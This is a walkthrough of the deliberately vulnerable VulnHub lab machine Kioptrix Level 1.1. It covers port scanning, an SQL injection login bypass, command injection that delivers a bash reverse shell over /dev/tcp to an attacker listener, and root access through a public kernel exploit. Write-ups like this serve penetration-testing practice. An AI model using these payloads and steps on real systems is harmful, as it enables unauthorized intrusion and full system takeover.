VulnHub: Kioptrix: Level 1.1 (#2)

Link: https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

1. Network discovery

nmap -sn <ip range>/24

The target is 10.0.2.7.

2. Port scan

nmap -Pn 10.0.2.7

3. High port scan

nmap -Pn -p1000- 10.0.2.7

Nothing more revealed comparing to previous scan.

4. Service and OS scan

nmap -p 22,80,111,443,631,3306 -A 10.0.2.7

5. Vuln scan

nmap -p 22,80,111,443,631,3306 --script vuln 10.0.2.7

7. Scan HTTP service on port 80

nikto -h http://10.0.2.7

Nothing more revealed

8. Access site

Read the source, nothing much.

Trying SQL injection by supplying input on both fields:

' or 1=1--

9. Next page, I will test its function by supplying an IP.

Success!!!

10. I’ll try command injection starting w/ ‘backtick’

Nothing

I tried w/ semi-colon

Success!!!

Try another command

Success!!!

11. Next, I will get a reverse shell.

Create listener on port 1234

rlwrap nc -lvp 1234

12. Paste reverse shell command using the cheatsheet.

Reverse Shell Cheat Sheet

I succeeded using this command.

Edit IP and port number to math listener.

10.0.2.24;bash -i >& /dev/tcp/10.0.2.24/1234 0>&1

Back to listener, now I have a shell.

Verify user

whoami

13. Privilege escalation.

I’ll use this script to do system enumeration.

diego-treitos/linux-smart-enumeration

python -m SimpleHTTPServer 80

Download the script to target.

wget http://10.0.2.7/lse.sh
chmod 777 lse.sh
./lse.sh

I’ll start searching for exploitation with kernel. From the script result, it’s CentOS 4.5 and Linux 2.6.9.

Lookin up on google, I came across with the second script from the results.

It’s no. is 9545.

Copy it w/ searchsploit

searchsploit -m 9545

Download to target machine.

wget http://10.0.2.7/9545.c

Read the script for compling command.

gcc -Wall -o linux-sendpage 9545.c
./linux-sendpage
whoami

Now, I’m root.

Read file on the system, I came across /var/mail/root

cat /var/mail/root